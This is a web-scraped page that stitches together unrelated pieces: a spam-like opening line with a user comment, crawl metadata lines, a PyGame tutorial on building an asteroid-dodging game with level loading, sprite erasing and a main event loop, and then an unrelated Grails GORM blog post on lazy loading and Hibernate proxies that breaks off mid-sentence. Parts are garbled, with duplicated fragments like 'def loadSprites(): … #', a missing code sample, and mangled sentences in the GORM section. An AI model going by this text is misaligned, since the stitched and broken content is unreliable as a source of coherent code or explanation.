Software supports corporate initiatives for multimodal transportation spend management and improvements in supply chain efficiency. alguraajan says: 2 years ago enchanting guides to our flourishing life aimed Alaguraajan
http://hubpages.com/hub/import_export_business
crawl-002
refinedweb
1,252
53.61
The Game Now it’s time to begin coding the internals of our game. Create a file called pydodge.py (after all, our game is about dodging objects) to store our game module, and let’s jump into some code. First, we’ll need to import the required modules: import imp import gamesprites import pygame import sys First, we import the imp module. The imp module will allow us to import modules in a more dynamic fashion. Since we store our levels as Python classes and will access them by importing them as modules, this functionality is needed. We then import the gamesprites module, which we constructed earlier to store the game’s Sprite classes, as well as pygame itself. Finally, sys is imported since we need to make use of sys.exit. Next, we’ll need to take care of some global variables: level = None player = None playerSprite = None objects= None background = None rows = None columns = None layout = None screen = None Don’t worry about what each one of these means right now. We’ll cover the purpose of each one as it is used. The first thing that needs to be done is the loading of levels. We’ll need to import the specified level file and then extract some basic information from it, such as the object images and the layout of the level as a whole: def loadLevel(levelFile): # Import the level and extract the data global level, player, objects, background, rows, columns, layout level = imp.find_module(levelFile) level = imp.load_module(‘level’, level[0], level[1], level[2]) level = level.Level() player = level.getPlayer() objects = level.getObjects() background, rows = level.getBackground() layout = level.getLayout() columns = len(layout[0]) In the above function, we use the imp module to search for the level by its name. Then, we import it as level. However, since we only need the single Level class that it contains, we re-assign level to an instance of the contained Level class. We then extract the player image and assign it to the player variable, and we get the list of object images and assign it to the objects variable. Next, we get the background image and the number of rows that will be visible at once. Finally, we get the layout list and retrieve the number of columns it calls for. {mospagebreak title=Setting Things Up}: def loadSprites(): … #: def loadSprites(): … #. {mospagebreak title=Cleaning Up} In earlier examples, we never used a very complex background. Because of this, erasing a sprite was simply a matter of filling up its position with a solid color. However, this time, we have a graphical background with many different elements at unique positions. Each time an object moves, we’ll need to replace its old position with the corresponding piece of background. Otherwise, things definitely wouldn’t look right. Thankfully, this is quite easy to do. Recall that when loading the background image, we store it in a variable called background. This object certainly hasn’t gone anywhere, and we’re free to access its contents—an original copy of the background—at any time. So, to erase an object in our game, we’ll simply clip the corresponding rectangle from the original background image and draw it in its proper place on the screen: def erase(screen, rect): # Get the piece of the original background and copy it to the screen screen.blit(background.subsurface(rect).copy(), rect) The subsurface method simply creates a “Surface object within a Surface object.” Both of the objects share pixels, so by creating a Surface object within our background, we have access to the exact contents of the area we need to access. We simply copy it and blit it to its proper place on the screen. It’s a lot easier than it sounds, taking just one line to do. {mospagebreak title=Constructing the Main Loop} Now that we’ve created functions to get things set up for us, we’re ready to get into the function containing the main loop of the game. Before we get into our function’s actual loop, though, we’ll have to do a bit of configuration. First, we’ll have to get the size of each position on the screen. This simply involves dividing the height and width of the background by the number of rows and columns. Then, we’ll have to define two variables that work with movement. When the user presses a key, the first variable will need to be set to the direction of the movement. When the user releases a key, the second variable will need to be set to True, which will signal movement to stop. This way, a user can hold down a key and see movement rather than have to repeatedly tap the key. Though we have a list of sprite groups, we also need a list that will store the sprite groups that are actually visible on the screen. This way, we’ll know which ones to update. Next, we need to actually draw the player. Finally, we’ll have to load custom events into the timer. This is done by setting the timer to trigger our own event IDs at set intervals. The first event will update the player, and the second event will update the objects. The speeds at which things will be updated will be passed as arguments. Here’s all this in action: def run(playerSpeed = 250, objectSpeed = 1000): # Get the row and column widths colWidth = background.get_rect().width / columns rowHeight = background.get_rect().height / rows # Define a variable that stores whether an arrow key is pressed # This is used for continuous/scrolling movement of the player moving = False # We should also define a variable that signals stops # Otherwise, if a player pushes a key in between updates and releases # it, the move will not be registered movingStop = False # Create a list to store the visible groups visible = [] # Blit the player updateRects = player.draw(screen) pygame.display.update(updateRects) # Load a screen update event into the timer # This will update the player only pygame.time.set_timer(pygame.USEREVENT + 1, playerSpeed) # Load a screen update event into the timer # This will update the objects pygame.time.set_timer(pygame.USEREVENT + 2, objectSpeed) With all that done, we’re now ready to jump into the main loop. First, we’ll need to check for quit events and key presses: def run(playerSpeed = 250, objectSpeed = 1000): … while True: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() # Check for a key push by the user elif event.type == pygame.KEYDOWN: if event.key == pygame.K_RIGHT: moving = ‘right’ elif event.key == pygame.K_LEFT: moving = ‘left’ # Check by a key release by the user elif event.type == pygame.KEYUP: if event.key == pygame.K_RIGHT or pygame.K_LEFT: movingStop = True The above code simply sets the player to move when a key is pressed, and it sets it to stop moving when a key is released. It also enables the player to exit the game. The next task ahead of us is moving the player around. To do this, we first need to check to see whether our custom player update event has been triggered. If it has, we then need to move the player in the proper direction, if any direction at all. We finally need to check to see whether the player has collided with any of the objects and then redraw the player: def run(playerSpeed = 250, objectSpeed = 1000): … # Check for the update player event elif event.type == pygame.USEREVENT + 1: # Move the player if needed if moving == ‘right’: player.update(colWidth) if moving == ‘left’: player.update(-colWidth) # Stop movement if needed if movingStop: moving = False movingStop = False # Collision detection for group in visible: if pygame.sprite.spritecollideany(playerSprite, group): return False # Redraw the player player.clear(screen, erase) updateRects = player.draw(screen) pygame.display.update(updateRects) As I mentioned earlier, the visible list above will contain a list of all the visible sprite groups. To check for collision, we iterate through this list and use pygame.sprite.spritecollideany. There’s no need to use a method that kills the colliding sprites since we want to completely back out of the loop. What object the player hits doesn’t really matter to us. As you can see, we return False to get out of the loop. All that’s left now is moving the objects around, an extremely simple task. This is done when our custom object update event has been triggered. If anything remains in the layout list, we add it to our visible list. Likewise, we delete any sprite group that has fallen off the screen. Aside from that, we simply update each sprite group, and if the visible list is empty, then the player has won the level. def run(playerSpeed = 250, objectSpeed = 1000): … # Check for the update object event elif event.type == pygame.USEREVENT + 2: # Add a row if layout: visible.append(layout.pop()) # Delete passed rows if visible: if visible[0].y >= screen.get_rect().height: visible.pop(0) # If there are no visible rows, the player has won else: return True # Make a list of rectangles to be updated updateRects = [] # Update each group for group in visible: group.clear(screen, erase) group.update(rowHeight) group.y = group.y + rowHeight updateRects.extend(group.draw(screen)) pygame.display.update(updateRects) {mospagebreak title=The Game in Action} All that’s left now is creating a Python script that will make use of our level and game module. To run our level, simply create a file named playAsteroid.py: import pydodge pydodge.loadLevel(‘asteroid’) pydodge.setup() pydodge.loadBackground() pydodge.loadSprites() pydodge.run() Of course, we can always customize our game a bit more. Let’s say that we want to use a title screen rather than forcing the user to jump right into the level. Also, let’s display either “Level Complete” or “Game Over”: import pydodge import pygame pydodge.loadLevel(‘asteroid’) pydodge.setup() pydodge.loadBackground() # Add a title font1 = pygame.font.Font(None, 25) text1 = font1.render(‘PyDodge Asteroid’, True, (255, 255, 255)) textRect1 = text1.get_rect() textRect1.centerx = pydodge.screen.get_rect().centerx textRect1.y = 100 pydodge.screen.blit(text1, textRect1) # Add “Press <Enter> To Play” font2 = pygame.font.Font(None, 17) text2 = font2.render(‘Press <Enter> To Play’, True, (255, 255, 255)) textRect2 = text2.get_rect() textRect2.centerx = pydodge.screen.get_rect().centerx textRect2.y = 150 pydodge.screen.blit(text2, textRect2) # Update the screen pygame.display.update() # Wait for enter to be pressed # The user can also quit waiting = True while waiting: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() elif event.type == pygame.KEYDOWN: if event.key == pygame.K_RETURN: waiting = False break pydodge.loadBackground() pydodge.loadSprites() # The user has won the game if pydodge.run(100, 300): text3 = font1.render(‘Level Complete’, True, (255, 255, 255)) textRect3 = text3.get_rect() textRect3.centerx = pydodge.screen.get_rect().centerx textRect3.y = 150 pydodge.screen.blit(text3, textRect3) # The user has lost the game else: text3 = font1.render(‘Game Over’, True, (255, 255, 255)) textRect3 = text3.get_rect() textRect3.centerx = pydodge.screen.get_rect().centerx textRect3.y = 150 pydodge.screen.blit(text3, textRect3) pygame.display.update() # Wait for the user to quit while True: for event in pygame.event.get(): if (event.type == pygame.QUIT) or (event.type == pygame.KEYDOWN): sys.exit() Conclusion As you can see, creating a functioning game with PyGame is rather easy. Our game module weighs in at around five kilobytes. Using the module, you can also customize games, loading whatever levels you would like and displaying extra messages and what-not. From here, try customizing your game even further. You can try adding a menu where the user can select a difficulty level. You can also link multiple levels together and randomize the layout lists in levels. It’s up to your imagination. Of course, there’s a lot more to PyGame than a simple space game like this, so feel free to explore the library and examine one of the many example games available on the PyGame website. Good luck!
http://www.devshed.com/c/a/python/a-pygame-working-example-continued/
CC-MAIN-2017-47
refinedweb
2,015
66.33
Yesterday Phil Haack wrote a post about Implementing an Authorization Attribute for WCF Web API. We’re doing something similar to handle auth using SimpleWebTokens handled by ACS and found a mix of approaches between Pedro Felix, Howard’s post, Lewis, and Johnny’s team who is also working on something similar. However I was too lazy to read the blogs and thrown this out to twitter knowing that @gblock would give me the answer I wanted in matter of minutes @woloski: when would you use a delegatingchannel vs httpoperationhandler? I’ve found different samples using both And indeed he replied. I like things explained in plain English from someone who really knows the thing, so here are the tweets with some color coding to separate one from the other. NOTE: make sure to also read Glenn’s post which goes into much more detail. @gblock: there are significant diffs. One is for pure http request / resp related concerns (message handlers) the other for app level @gblock: one is global / knows nothing about the service the other does knows about the service. @gblock: one is a Russian doll allowing pre-post handling, the other is a sequential pipeline. @gblock: one handles model binding type scenarios (operation handlers) the other does not @gblock: one is async (message handlers) the other is sync. So if you have something io bound use message handlers @gblock: for cross cutting http concerns like etags, or if-none-match use message handlers. @gblock: for validation / logging of app data use operation handlers. For security you might use both as Howard did for Oauth @gblock: if it is truly cross cutting and doesn’t require details about the operation itself like parameter values. @gblock: message handlers can handle requests dynamically ie they can handle a request to foo without an op foo @gblock: architecturally I think they make sense even though there is some overlap. HTTP concerns vs app concerns is the line. For our case we will use HttpOperationHandlers because we want access to the operation to check that it contains an attribute. Case closed! Hace algo mas de un mes Edu Mangarelli me invito a dar un web cast de Windows Azure AppFabric, que acepte con gusto. Finalmente, el Miercoles pasado con Hernan Meydac Jean hicimos una presentacion de 1 hora de este tema. En particular nos enfocamos en explicar ServiceBus Messaging (colas, topics y subscriptions) y Access Control Service (la version 2 que esta en produccion). Dejo aqui el link del webcast que fue grabado para aquellos que les interese. No, it’s not because Local Storage quota is low. That’s easy to fix by just increasing the quota in the SerivceDef. I hit this nasty issue while working with WebDeploy, but since you might get this in a different context as well I wanted to share it and get hours back of your life, dear reader WebDeploy throws an out of disk exception when creating a package There is not enough space on the disk. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.WriteCore(Byte[] buffer, Int32 offset, Int32 count) at System.IO.BinaryWriter.Write(Byte[] buffer, Int32 index, Int32 count) at Microsoft.Web.Deployment.ZipEntry.ReadFromFile(String path, Boolean shouldCompress, BinaryWriter tempWriter, Stream stream, FileAttributes attr, DateTime lastModifiedTime, String descriptor, Int64 size) at Microsoft.Web.Deployment.ZipEntry..ctor(String path, DeploymentObject source, ZipFile zipFile) WebDeploy uses a temp path to create temporary files during the package creation. This folder seems to have a 100MB quota according to MSDN, so if the package is more than that, the process will throw an IO exception because the “disk is full” even though there is plenty of space. Below a trace of Process Monitor running from the Azure Web Role showing the CreateFile returning DISK FULL. By looking with Reflector, we can validate that WebDeploy is using Path.GetTempPath. Since we can’t change WebDeploy code nor parameterize it to use a different path, the solution is to change the TEMP/TMP environment variables, as suggested here. An excerpt… Ensure That the TEMP/TMP Target Directory Has Sufficient Space The standard Windows environment variables TEMP and TMP are available to code running in your application. Both TEMP and TMP point to a single directory that has a maximum size of 100 MB. Any data stored in this directory is not persisted across the lifecycle of the hosted service; if the role instances in a hosted service are recycled, the directory is cleaned. If the temporary directory for the hosted service runs out of space, or if you need data to persist in the temporary directory across the lifecycle of the hosted service, you can implement one of the following alternatives: The following code example shows how to modify the target directories for TEMP and TMP from within the OnStart method: using System; using Microsoft.WindowsAzure.ServiceRuntime; namespace WorkerRole1 { public class WorkerRole : RoleEntryPoint { public override bool OnStart() { string customTempLocalResourcePath = RoleEnvironment.GetLocalResource("tempdir").RootPath; Environment.SetEnvironmentVariable("TMP", customTempLocalResourcePath); Environment.SetEnvironmentVariable("TEMP", customTempLocalResourcePath); // The rest of your startup code goes here… return base.OnStart(); } } }. So I teamed with Alejandro Iglesias and Fernando Tubio from the Southworks crew and together we created the Windows Azure Accelerator for Worker Roles.! Yesterday! Como habia escrito en un post anterior, aqui dejo un video donde muestro Windows Identity Foundation y Windows Azure Access Control Service. En este ejemplo muestro lo siguiente: Sobre el final contesto algunas preguntas… Espero que les sea util!: Having a working solution requires the following steps: < uploaded the small proof of concept here. Enjoy! Hace un par de meses tuve el agrado de participar en el Windows Azure Bootcamp organizado por Microsoft Argentina. Fue un evento de dos dias en el cual presente Windows Azure AppFabric (Caching y Access Control Service). Si conocen mi background se imaginaran que le dedique el 30% a Caching y el 70% a Access Control Gracias a Guada y Microsoft que grabaron el evento y postearon el material. Me tome el trabajo de subirlo a vimeo para que no se tengan que bajar un wmv completo de 700MB. Contenido: 0:00 – 0:03 minutos: intro, agenda y un poco de blah blah 0:03 – 0:25 minutos: Teoria de Windows Azure AppFabric Caching 0:25 – 1:00 minutos: Introduccion a Identidad Federada, Protocolos, Claims, STS, FAQ, ADFSv2 y Windows Azure AppFabric Access Control Service v2. En un proximo post, la semana que viene, publicare la segunda parte de la charla en donde utilizo el Access Control Service para asegurar una aplicacion y utilzar diferentes proveedores de identidad. UPDATE: la segunda parte esta publicada Espero que les sea util! During the last couple of years we have helped companies deploying federated identity solutions using WS-Fed and SAML2 protocols with products like ADFS, SiteMinder in various platforms. Claims-based identity has many benefits but as every solution it has its downsides. One of them is the additional complexity to troubleshoot issues if something goes wrong, especially when things are distributed and in production. Since the authentication is outsourced and it is not part of the application logic anymore you need someway to see what is happening behind the scenes. I’ve used Fiddler and HttpHook in the past to see what’s going on in the wire. These are great tools but they are developer-oriented. If the user who is having issues to login to an app is not a developer, then things get more difficult. Fred, one of the guys working on my team, had the idea couple of months ago to implement the latter. So we coded together the first version (very rough) of the token debugger. The code is really simple, we are embedding a WebBrowser control in a Winforms app and inspecting the content on the Navigating event. If we detect a token being posted we show that. Let’s see how it works. First you enter the url of your app, in this case we are using wolof (the tool we use for the backlog) that is a Ruby app speaking WS-Fed protocol. . After clicking the Southworks logo and entering my Active Directory account credentials, ADFS returns the token and it is POSTed to the app. In that moment, we intercept it and show it. You can do two things with the token: send it via email (to someone that can read it ) or continue with the usual flow. If there is another STS in the way it will also show a second token. Since I wanted to have this app handy I enabled ClickOnce deployment and deployed it to AppHarbor (which works really well btw) If you want to use it browse to and launch the ClickOnce app @ If you want to download the source code or contribute @
http://southworks.com/blog/author/mwoloski/
CC-MAIN-2016-40
refinedweb
1,468
50.46
So I've started working with c++ for my university classes and it's been going really well so far. There's a dilemma I'm having with a current question and I've got the basic code structure all figured out, there's just one problem with my output. What I'm looking for e.g; if (bool variable = true){ output else alternate output #include "stdafx.h" #include <iostream> #include <iomanip> using namespace std; //function prototypes bool calculateBox(double, double, double, double *, double *); int main() { //defining variables double length, width, height, volume, surfaceArea; cout << "Hello and welcome to the program.\nPlease enter the dimensions for the box in [cm](l w h): "; cin >> length >> width >> height; calculateBox(length, width, height, &volume, &surfaceArea); if (bool calculateBool = true) { cout << "Volume: " << volume << "cm^3" << endl << "Surface Area: " << surfaceArea << "cm^2" << endl; } else cout << "Error, value(s) must be greater than zero!" << endl; system("pause"); return 0; } //functions bool calculateBox(double length, double width, double height, double * volume, double * surfaceArea) { if ((length > 0) && (width > 0) && (height > 0)) { *surfaceArea = length * width * 6; *volume = length * width * height; return true; } else return false; } In the statement if (bool calculateBool = true) the bool calculateBol part will cause a local variable named calculateBool be defined as a bool. The = true part means to assign what's on the left of =to the value true. The whole bool calculateBool = true will therefore be true so that that the else clause will never be executed. Note that the the occurence of a single = in a condition should always ring the bell that bad signs could happen. Because comparing for equality is ==. This being said, you could write: if (calculateBox(length, width, height, &volume, &surfaceArea)) { or if you need the value later on: bool calculateBool = calculateBox(length, width, height, &volume, &surfaceArea); if (calculateBool) { // or calculateBool==true if you prefer
https://codedump.io/share/S0rSWJDZMzBt/1/c-boolean-function-operands
CC-MAIN-2018-13
refinedweb
308
55.78
No best type found for implicitly typed array. Array elements must all be the same type or implicitly convertible to the same type according to the type inference rules used by the compiler. The best type must be one of the types present in the array expression. Elements will not be converted to a new type such as object. For an implicitly typed array, the compiler must infer the array type based on the type of elements assigned to it. To correct this error Give the array an explicit type. Give all array elements the same type. Provide explicit casts on those elements that might be causing the problem. Example The following code generates CS0826 because the array elements are not all the same type, and the compiler's type inference logic does not find a single best type: // cs0826.cs public class C { public static int Main() { var x = new[] { 1, "str" }; // CS0826 char c = 'c'; short s1 = 0; short s2 = -0; short s3 = 1; short s4 = -1; var array1 = new[] { s1, s2, s3, s4, c, '1' }; // CS0826 return 1; } } See Also Implicitly Typed Local Variables
https://docs.microsoft.com/en-us/dotnet/articles/csharp/language-reference/compiler-messages/cs0826
CC-MAIN-2017-22
refinedweb
187
69.62
The following message is a courtesy copy of an article that has been posted to comp.lang.python as well. Dear Mr. Handheld Vacuum, You will probably get better answers to your Boost.Python questions if you post them to the C++-sig. See. thedustbustr at aol.com (TheDustbustr) writes: > I'm writing a game in C++ which calls out to python for scripting. I'd like to > expose the instance of my Game class (a singleton) to python (so that the > instances of Clock, Camera, etc are available to the scripts). > > I ran into trouble trying to expose a specific instance (or even a function > returning the instance). Here is a simplification of my problem in code (c++): > > <code> > class A{ > public: > int i; > }; > class B{ > public: > A a; > }; > B b; > B getb() {return b;} //return the instance > > int main() { > getb().a.i = 42; > return 0;} > #include <boost/python/module.hpp> > #include <boost/python/class.hpp> > #include <boost/python/def.hpp> > using namespace boost::python; > BOOST_PYTHON_MODULE(hello) > { > class_<A>("A",init<>()) > .def("i", &A::i); > class_<B>("B",init<>()) > .def("a", &B::a); > def("getb", getb); > } > </code> > > Of course, I would be calling any python script using these classes from within > main(). > > This doesn't compile (using bjam with msvc). If I return by reference or > pointers in getb it gets ugly (like pages and pages of error messages). Am I > doing this the right way? How do I expose an instance to python? -- Dave Abrahams Boost Consulting
https://mail.python.org/pipermail/cplusplus-sig/2003-July/004631.html
CC-MAIN-2016-50
refinedweb
249
68.87
* Saving details of rooms Ross McManus Greenhorn Joined: Jul 28, 2010 Posts: 28 posted Aug 10, 2010 11:38:27 0 I am creating a hotel booking system. On the sheet I have it tells me "You will be asked to save details of rooms. Remember to add the appropriate interface in the Room class declaration. " I a GUI done which is this I don't understand which room details I have to save. I guess it will be the roomNumber, type, capacity, rate etc but do I just save what is in the toString methods on each class or would I have to create rooms then save them like on the GUI I have bedroom's 201 to 212 do I have to create 12 bedroom objects then save the details of them? Later on it says that I have create a vector of the rooms to be searched. The code I have so far for the Room, Bedroom & MeetingRooms are. public class Room { public int roomNumber; public double rate; public String customer; public Room() { } public Room(int n, double t) { } public void bookRoom(String cust) { customer = cust; } public void clearBooking() { customer = null; } public String getCustomer() { return customer; } public double getRate() { return rate; } public int getRoomNumber() { return roomNumber; } public String toString() { Room room = new Room(); return customer + " is in: " + roomNumber + " " + " at a price of " + rate; } } public class Bedroom extends Room { String roomtype; Bedroom() { } Bedroom(int n, double t, String customer) { if( n >= 201 && n <= 203) { t = 35; roomtype = "Single"; } else if(n>= 204 && n <= 212) { t = 60; roomtype = "Double"; } System.out.println("Please enter a correct room number"); } String getType() { return roomtype; } @Override public String toString() { Bedroom bdRoom1 = new Bedroom(); return customer + " is in: " + roomNumber + " " + "this is a" + bdRoom1.getType() + " " + "room" + " " + " at a price of " + rate; } } public class MeetingRoom extends Room { int seatingCapacity; int c = seatingCapacity; MeetingRoom(int n, double t, int c) { if( n == 101) { t = 120.00; c = 20; } else if(n == 102) { t = 150.00; c = 35; } else if(n == 103) { t = 250.00; c = 50; } else { System.out.println("Please enter a correct room number"); } } int getCapacity() { return c; } public String toString() { MeetingRoom mtroom = new MeetingRoom(); return customer + " is in: " + roomNumber + " " + "the capacity of this room is" + mtroom.getCapacity() + " " + " " + " at a price of " + rate; } } I agree. Here's the link: subject: Saving details of rooms Similar Threads Search A Vector Adding JLabels to a vector if statement help with a booking system Quick Question All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/506138/java/java/Saving-details-rooms
CC-MAIN-2014-15
refinedweb
426
62.92
. It might not come as surprise that my most active years editing this site were when I was a teenager. Specifically, I joined RW at the ripe age of 13, making this particular account the day of my 14th birthday. I wouldn't advise anyone to go back and look at my contributions from that time, but they're about what you might expect from such a person. I was 17 and 18 years old during my most passionate time here - the prolonged user rights crisis in 2011, becoming a moderator, and later a member of the RMF Board of Trustees. Afterward, I became inactive and decided to forgo my involvement with RW. What I regret most about my time here was my own immaturity. Though, when I think back to it, I was more tenacious here than I could ever imagine being now. I've lost much of the spark and the fire behind my motives and opinions since stepping back from RW. That, at least, counts for something. Messages on my talk page will still be read and answered to the best of my ability, if for some reason anyone has something to say. I am an editor on RationalWiki, though no longer active. I was a moderator for a little over one year. (Before that, I was a mystical bureaucrat; all bureaucrats have since vanished into the waters of the Great Flood.) I welcome questions and I don't often bite the newbies. I also have a pretty high threshold for trolling, and don't use my banhammer very much at all. When banning is necessary, I like to go through a consensus-driven process that culminates in a community vote. For a time, I was versed in the ways of MediaWiki. I made a bot running on Python and the pywikipedia library that did menial tasks. a sample of things I began Extension:DynamicPageList (DPL), version 2.3.0 : Error: Wrong 'namespace' parameter: 'Main'! Help: <code>namespace= <i>empty string</i> (Main) | Category | Category_talk | Conservapedia | Conservapedia_talk | Debate | Debate_talk | Draft | Draft_talk | Essay | Essay_talk | File | File_talk | Forum | Forum_talk | Fun | Fun_talk | Gadget | Gadget_definition | Gadget_definition_talk | Gadget_talk | Help | Help_talk | MediaWiki | MediaWiki_talk | RationalWiki | RationalWiki_talk | Recipe | Recipe_talk | Summary | Summary_talk | Talk | Template | Template_talk | Thread | Thread_talk | User | User_talk</code>.
https://rationalwiki.org/wiki/User:Blue
CC-MAIN-2018-43
refinedweb
374
62.48
table of contents conflicting packages NAME¶sd_bus_get_name_creds, sd_bus_get_owner_creds - Query bus client credentials SYNOPSIS¶ #include <elogind/sd-bus.h> int sd_bus_get_name_creds(sd_bus *bus, const char *name, uint64_t mask, sd_bus_creds **creds); int sd_bus_get_owner_creds(sd_bus *bus, uint64_t mask, sd_bus_creds **creds); DESCRIPTION¶sd_bus_get_name_creds() queries the credentials of the bus client identified by name. The mask parameter is a combo of SD_BUS_CREDS_* flags that indicate which credential info the caller is interested in. See sd_bus_creds_new_from_pid(3) for a list of possible flags. On success, creds contains a new sd_bus_creds instance with the requested information. Ownership of this instance belongs to the caller and it should be freed once no longer needed by calling sd_bus_creds_unref(3). sd_bus_get_owner_creds() queries the credentials of the creator of the given bus. The mask and creds parameters behave the same as in sd_bus_get_name_creds(). RETURN VALUE¶On success, these functions return a non-negative integer. On failure, they return a negative errno-style error code. Errors¶Returned errors may indicate the following problems: -EINVAL An argument is invalid. -ENOPKG The bus cannot be resolved. -EPERM The bus has already been started. -ECHILD The bus was created in a different process. -ENOMEM Memory allocation failed.
https://manpages.debian.org/testing/libelogind-dev-doc/sd_bus_get_name_creds.3.en.html
CC-MAIN-2021-39
refinedweb
192
50.94
The most powerful of the Tkinter widgets is the canvas. You can use it to create general graphics and it can be used to create custom widgets. It's worth knowing about. The canvas widget is "just another widget" and in this sense you already know quite a lot about how to use it, but there a few specifics that make it more than "just a widget". The canvas widget can be added to a suitable container often the root window in the usual way. For example the simplest canvas setup program you can imagine is: from tkinter import *root=Tk()w = Canvas(root, width=500, height=500)w.pack()root.mainloop() from tkinter import * root=Tk()w = Canvas(root, width=500, height=500)w.pack() root.mainloop() This creates a canvas widget 500x500 pixels and sizes the root window to fit. You can also add a border to the canvas, but there is one small problem - it sits inside the canvas coordinate system which means you can't draw in the space it occupies. The best solution is don't use a border but place the canvas in a frame and give the frame a boarder. An alternative is to move the co-ordinate system by the size of the border - more about this later. For now to create a canvas without a border or anything that obscures the edges of the coordinate system use: w = Canvas(root, width=500, height=500, borderwidth=0, highlightthickness=0, background='white') As an example of a canvas with a border and some padding try: root=Tk()w = Canvas(root, width=500, height=500, borderwidth=5, background='white', relief='raised')w.pack(padx=10,pady=10)root.mainloop() root=Tk()w = Canvas(root, width=500, height=500, borderwidth=5, background='white', relief='raised')w.pack(padx=10,pady=10) The next question we have to answer is how to draw on a canvas but first it helps to understand the general approach that the widget uses to graphics. Don't get the Tkinter canvas widget confused with the HTML5 canvas element - because they work in completely different ways. The canvas widget works with vector graphics and in a retained mode. That is you draw on the canvas widget by specifying graphics primitives like circles or rectangles and the canvas stores the commands in a display list. When the time comes to redraw the display the canvas processes the display list and draws the shapes onto a bitmap which is then copied to the screen. What this means is that what you draw to the canvas is retained between redraws and you don't have to explicitly redraw everything each time the window is obscured - this is usually called retained mode graphics. It also means that the details of the objects that you draw are available to the canvas widget and it can handle updates to their attributes, color, position and so on and it can bind events to them. This is what makes the canvas not just a way of creating general purpose graphics but also a way to create new widgets. Graphics object also have a drawing order which can be used to place one object in front of another. If you are more familiar with pixel based bitmap graphics then this approach and the way it works will seem strange at first but it has big advantages. However it does have the disadvantage of being potentially slow. Keeping track of the display list and having to process it every time a redraw is required can be time consuming. To try to speed things up the canvas widget uses a "dirty" rectangle which marks out the smallest area of the display that has to be redraw and it only redraws objects within this area. Even so if you fill a canvas with a lot of graphics objects it can slow down to become unacceptable. The only solution in this case is to limit the total number of objects which have to be redrawn. Usually this can be done by clearing the canvas of all objects: w.delete(ALL) and then redrawing only the objects that are current. Another standard canvas pattern is to avoid drawing new objects but to reuse objects that have already been drawn. For example if you want to draw a moving graph then using bitmap graphics the usual method is to just keep plotting points but this would eventually overwhelm the canvas display list. In this case you should draw the number of points needed and simply move them around the screen to create the animated curve. The simplest drawing command that can be used to illustrate these ideas is the rectangle. The canvas method create_rectangle(bbox, options) will draw a rectangle at the given bounding box i.e. the coordinates of the top left-hand and bottom right-hand corner using the specified options. For example to draw an outline of a rectangle with top left-hand corner at 0,0 and bottom right-hand corner at 10,10 you would use: w.create_rectangle(0,0,10,10) The coordinate system within the canvas has 0,0 at the top left, x increases to the right and y increases down the screen. More about co-ordinate systems later. If you run the program you will see a rectangle but there is more to it than meets the idea. This is a retained system and the rectangle that you have just drawn is an object contained by the canvas widget. When you create a graphics object the method returns an id that you can use to refer to the graphics object again. There are a range of different methods that can make use of the id to modify the graphics object. For example the coords method can be used to set the coordinates of the object. In most cases you have to specify four coordinates for the bounding box. If you don't specify new co-ordinates then it returns the current co-ordinates. So to move the rectangle we created earlier to a new location you might use: id1=w.create_rectangle(0,0,10,10)w.coords(id1,100,100,110,110) id1=w.create_rectangle(0,0,10,10) w.coords(id1,100,100,110,110) which first creates the rectangle at 0,0 and then moves it to 100,100. If you want to move the rectangle from its current position to a new one displaced by Dx,Dy then you can use something like: x1,y1,x2,y2=w.coords(id1)w.coords(id1,x1+Dx,y1+Dy,x2+Dx,y2+Dy) x1,y1,x2,y2=w.coords(id1) w.coords(id1,x1+Dx,y1+Dy,x2+Dx,y2+Dy) <ASIN:0596158068> <ASIN:1449382673>
https://www.i-programmer.info/programming/python/5105-creating-the-python-ui-with-tkinter-the-canvas-widget.html
CC-MAIN-2019-35
refinedweb
1,129
59.94
GORM Gotchas (Part 3) It’s great to hear that people are finding these articles useful, so it’s with great pleasure that I add another to the series. This time I’m going to talk about associations again, but with the focus on when they are loaded into memory. Update 2 Aug 2010 I have added more information on eager fetching with one-to-many relationships because there are some issues you need to be aware of. It's cool to be lazy One of the first things people learn about GORM relationships is that they are loaded lazily by default. In other words, when you fetch a domain instance from the database, none of its relations will be loaded. Instead, GORM will only load a relation when you actually use it. Let’s make this a bit more concrete by considering the example from the previous article: class Location { String city } class Book { String title static constraints = { title(blank: false) } } class Author { String name Location location static hasMany = [ books: Book ] } If we fetch an Author instance, the only information we can use without another query being executed is the author’s name. When we try to get the associated location or the books, more queries are kicked off to get the extra data we need. This is really the only sensible default option, particularly with complex models that have long chains of associations. If eager fetching were the default, you could feasibly end up pulling in half the data from the database simply by fetching a single instance. Nonetheless, this option is not without cost. I’ll look at three side-effects of lazy associations so that you know what they are, can recognise the symptoms, and can fix any problems resulting from those side-effects. Proxies Lazy loading of associations involves some magic. After all, you don’t want the location property above to return null, do you? So Hibernate uses proxies and custom collection classes to provide transparent access to the lazy-loaded collections and associations - you don’t have to worry about the fact they’re not in memory yet. Normally these proxies do a great job of hiding the work that goes on behind the scenes, but occasionally the implementation leaks through. As an example, consider this domain model: class Pet { String name } class Dog extends Pet { } It’s a very simple inheritance hierarchy, so you wouldn’t expect any nasty surprises. Now imagine that we have a Dog instance in the database with an ID of 1. What do you think will happen with the following code? def pet = Pet.load(1) assert pet instanceof Dog Intuitively, this should work. After all, the pet with ID 1 is a Dog. So why does the assertion fail? Instead of fetching the underlying instance from the database, the load() method returns a proxy that executes the required query on demand, for example when you try to access a property other than id. This proxy is a dynamic subclass of Pet rather than Dog so the instanceof check fails. It continues to fail even after the instance is loaded from the database! In diagrammatic form: Changing Pet.load() to Dog.load() will fix the problem, since the proxy will then be a dynamic subclass of Dog. You can also make it work by relacing load() with get(), because the implementation of the latter automatically unwraps the proxy and returns the underlying Dog instance. In fact, Grails works hard to perform this automatic unwrapping in many other situations, so you’re unlikely to come across the issue. That’s one of the reasons it comes as such as surprise when you do. There is one other scenario that may cause some heartache, although it should be fairly rare. Imagine you have another class, Person, that has a relationship to Pet like so: class Person { String name Pet pet } The pet relationship is lazy, so when you get the Person instance, the pet property will be a proxy. that’s a Dog, and assuming that the two are related via the pet property, the first three assertions will succeed but the last one will not. Get rid of the other lines of code and suddenly that assertion will succeed. Huh? This behaviour is undoubtedly confusing, but its roots lie in the Hibernate session. When you retrieve the Person from the database, its pet property is a proxy. That proxy is stored in the session and represents the Pet instance with ID 1. Now, the Hibernate session guarantees that no matter how many times you retrieve a particular domain instance from within a single session, Hibernate will return you the 